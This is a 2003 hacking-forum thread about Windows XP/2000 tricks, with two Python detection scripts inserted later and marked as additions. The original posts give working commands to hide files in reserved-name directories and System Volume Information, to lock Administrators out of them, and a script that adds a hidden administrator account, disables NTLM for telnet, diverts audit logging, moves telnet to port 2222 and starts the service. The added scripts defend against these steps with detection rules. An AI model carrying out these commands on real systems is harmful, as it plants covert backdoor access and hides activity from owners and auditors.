Government Security
Network Security Resources

Windows Xp/2k Information


#1 Fuas

Posted 26 December 2003 - 07:56 AM

Been reading this board and must say it's excellent, so thought I would share some of my knowledge.

Illegal Dirs.

use md \\.\(drive):\(path)
ie md \\.\c:\recycler\com1\aux\lpt1\lpt2\nul\end

note: you must include a valid dir at the last entry to be able to enter it.

to enter the dir simply use cd c:\recycler\com1\aux\lpt1\lpt2\nul\end
and it will change. you can then store whatever into here :)

another nice hiding place is c:\system volume information. this is usually inaccessible by local users. so nice to hide files :)


disable NTLM and enable clear text password in windows XP for telnet.

tlntadmn config sec=-ntlm+passwd

then use

tlntadmn config auditlocation=file
to stop logging to eventviewer


scripting telnet using ftp.exe.

first make a txt file with the commands you need. ie

file.txt contains
net user testing test123 /add
net localgroup administrators test123 /add
tlntadmn config sec=-ntlm+passwd
tlntadmn config auditlocation=file
tlntadmn config port=2222
net start telnet
quit

(so adds a username to the system. then enables clear text, change telnet port to 2222 and then starts the telnet service)

to run use ftp.exe -s:file.txt -n (ip) (port)

it will then connect to the (ip) using (port) and run the commands in the file :)

____

hope this info is useful to somebody out there :) njoy and b safe.

Note: Updated the telnet bits. should work correct now sorry.
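
Added example, not part of the original post: a defender-side triage of process-creation command lines for the changes described above (NTLM turned off for Telnet, Telnet auditing moved out of the Event Viewer, a non-default Telnet port, new local accounts, ftp.exe run with a -s: script). The rule names, the (host, command line) event shape and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

T = r"\btlntadmn(?:\.exe)?\b.*\b"   # a tlntadmn invocation, then one of its options
N = r"\bnet1?(?:\.exe)?\s+"         # net.exe or net1.exe
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("telnet_ntlm_disabled",     T + r"sec\s*=\s*\S*-ntlm"),
    ("telnet_audit_to_file",     T + r"auditlocation\s*=\s*file\b"),
    ("telnet_port_changed",      T + r"port\s*=\s*(?!23\b)\d+"),
    ("telnet_service_start",     N + r"start\s+(?:telnet|tlntsvr)\b"),
    ("local_user_added",         N + r"user\s+\S+.*\s/add\b"),
    ("admin_group_member_added", N + r'localgroup\s+"?administrators"?\s+\S+.*/add\b'),
    ("ftp_script_file",          r"\bftp(?:\.exe)?\b.*\s-s:\S+"),
]]
ACCOUNT = {"local_user_added", "admin_group_member_added"}
TELNET = {"telnet_ntlm_disabled", "telnet_audit_to_file",
          "telnet_port_changed", "telnet_service_start"}

def match_rules(cmdline):
    """Names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Group hits per host; account changes plus Telnet weakening rate 'high'."""
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host].update(match_rules(cmdline))
    report = {}
    for host, names in hits.items():
        if names:
            severity = "high" if names & ACCOUNT and names & TELNET else "review"
            report[host] = (severity, sorted(names))
    return report

SAMPLE_EVENTS = [  # constructed (host, command line) pairs, not real logs
    ("HOST-A", "net user testing test123 /add"),
    ("HOST-A", "net localgroup Administrators testing /add"),
    ("HOST-A", "tlntadmn config sec=-ntlm+passwd"),
    ("HOST-A", "tlntadmn config auditlocation=file"),
    ("HOST-A", "tlntadmn config port=2222"),
    ("HOST-A", "net start telnet"),
    ("HOST-B", "net user"),                      # listing accounts only
    ("HOST-B", "ftp.exe ftp.example.com"),       # interactive ftp, no script
    ("HOST-B", "tlntadmn config port=23"),       # default port
    ("HOST-C", "net user svc_backup Example-Pass1 /add"),
]

if __name__ == "__main__":
    for host, (severity, names) in triage(SAMPLE_EVENTS).items():
        print(host, severity, ", ".join(names))
```
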

#2 GhostCow

Posted 26 December 2003 - 04:03 PM

thanks great info!!
does the illegal dir stay hidden after you put files in it too?

#3 daTh0r

Posted 26 December 2003 - 04:08 PM

thx :lol:

i'll try it immediately :lol:

#4 jimmy

Posted 26 December 2003 - 04:49 PM

hmmz
there are several commands to display everything in those locked dirs
the easiest one is

dir *.* /s

when you start in that dir of course

example

D:\test\temp>dir *.* /s
 De volumenaam van station D is HARDDISK
 Het volumenummer is 80DA-684B

 Map van D:\test\temp

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
27/12/2003  01:49    <DIR>          lala
27/12/2003  01:49    <DIR>          tata
               0 bestand(en)                0 bytes

 Map van D:\test\temp\lala

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
               0 bestand(en)                0 bytes

 Map van D:\test\temp\tata

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
               0 bestand(en)                0 bytes

     Totaal aantal weergegeven bestanden:
               0 bestand(en)                0 bytes
               8 map(pen)  58.934.087.680 bytes beschikbaar

this will also show the locked paths/Illegal Dirs.

#5 Fuas

Posted 27 December 2003 - 12:55 AM

Jimmy, you are correct, But if you use c:\system volume information\com1\aux\hidden then you can't dir /s because you cannot enter system volume information locally. and if you try remotely you cannot enter the com1 dir to find the rest of the path.

Ghostcow: yes the dir stays hidden. even after files added.

you can also dir \\.\dirs to find path too. but passed the info as it may hide stuff better than some ppl are doing atm (like using c:\stro to store stuff ;) )

#6 zero-maitimax

Posted 27 December 2003 - 11:05 AM

and now the big question... can you put an active exe file in it.. and it still can run it...

#7 skorpio

Posted 27 December 2003 - 03:08 PM

Fuas thx for the sharing, but there is an error :P

when u create a user :

net user testing test123 /add
net localgroup administrators test123 /add


u give the attributes at user "test123" and u have created the user testing :D

therefore the exact writing is:


net user testing test123 /add
net localgroup Administrators testing /add


Thx another for the sharing, bye :D
sorry for my english :-\

#8 Jackson

Posted 28 December 2003 - 05:02 AM

@echo off
md e:\System Volume Information\dir\
md e:\System Volume Information\dir\aux\ \
md e:\System Volume Information\dir\aux\.tmp\
md e:\System Volume Information\dir\aux\.tmp\result
cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
echo Hidden Directory is created
@echo on

when u have made ur hidden dir then u can put all files in this dir and can exec files
sry for my english

#9 Guest_LittleHacker_*

Posted 28 December 2003 - 05:43 AM

www.Free-Host.com is Hacked!

< I can't add a New Topic ! >

#10 skorpio

Posted 28 December 2003 - 07:46 AM

LittleHacker, what is the sense of your post ????


you are a spammer!! -.-

#11 Guest_LittleHacker_*

Posted 16 January 2004 - 02:58 PM

> LittleHacker, what is the sense of your post ????
>
> you are a spammer!! -.-

No, but I'm not able to make a new topic and I'd told this

> < I can't add a New Topic ! >

Why?
I think I'd not enough posts! :(

#12 Guest_saendler_*

Posted 17 January 2004 - 05:56 AM

> @echo off
> md e:\System Volume Information\dir\
> md e:\System Volume Information\dir\aux\ \
> md e:\System Volume Information\dir\aux\.tmp\
> md e:\System Volume Information\dir\aux\.tmp\result
> cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
> echo Hidden Directory is created
> @echo on
>
> when u have made ur hidden dir then u can put all files in this dir and can exec files
> sry for my english

very nice way to hide folder and how to delete such?

thx

#13 Guest_^GuZeD^_*

Posted 17 January 2004 - 08:29 AM

thanx for the folder hiding tip, was always doing it in another way but this one looks better, will try it when i have to fix a new box.

#14 Guest_saendler_*

Posted 17 January 2004 - 08:41 AM

how to delete
----------------
look into hidden folder e.g. dir \\.\C:\SystemVolumeInformation\dir\aux\.tmp

to delete e.g. rd \\.\C:\SystemVolumeInformation\dir\aux\.tmp\result
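
Added example, not part of the thread: the directories discussed here still show up when a listing is taken through the \\.\ prefix (posts #5 and #14), so a saved listing can be checked offline for path components that normal Win32 name parsing refuses. The function names and the sample paths are assumptions constructed for illustration.

```python
import re

# DOS device names that ordinary Win32 path parsing will not accept as a
# file or directory name.
RESERVED = {"CON", "PRN", "AUX", "NUL"}
RESERVED |= {f"COM{n}" for n in range(1, 10)} | {f"LPT{n}" for n in range(1, 10)}
PREFIX = re.compile(r"^\\\\[.?]\\")   # leading \\.\ or \\?\ on a listed path

def audit_path(path):
    """Return (component, reason) for each part a normal path could not carry."""
    findings = []
    parts = PREFIX.sub("", path).split("\\")
    for part in parts[1:]:                      # parts[0] is the drive
        if part in ("", ".", ".."):
            continue
        # Classic Win32 also treats "nul.txt" or "aux " as the device itself.
        base = part.split(".", 1)[0].rstrip(" ").upper()
        if base in RESERVED:
            findings.append((part, "reserved device name"))
        elif part != part.rstrip(" ."):
            # Win32 strips trailing spaces and dots, so the name is unreachable.
            findings.append((part, "trailing space or dot"))
    return findings

def audit_listing(paths):
    """Map each flagged path in a listing to its findings."""
    return {p: f for p in paths if (f := audit_path(p))}

SAMPLE_LISTING = [  # constructed lines, shaped like bare recursive dir output
    r"\\.\c:\recycler\com1\aux\lpt1\lpt2\nul\end\notes.txt",
    r"e:\System Volume Information\dir\aux\ \.tmp\result",
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Users\alice\Documents\console.log",
    r"C:\data\report.",
]

if __name__ == "__main__":
    for path, findings in audit_listing(SAMPLE_LISTING).items():
        print(path)
        for component, reason in findings:
            print(f"    {component!r}: {reason}")
```
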




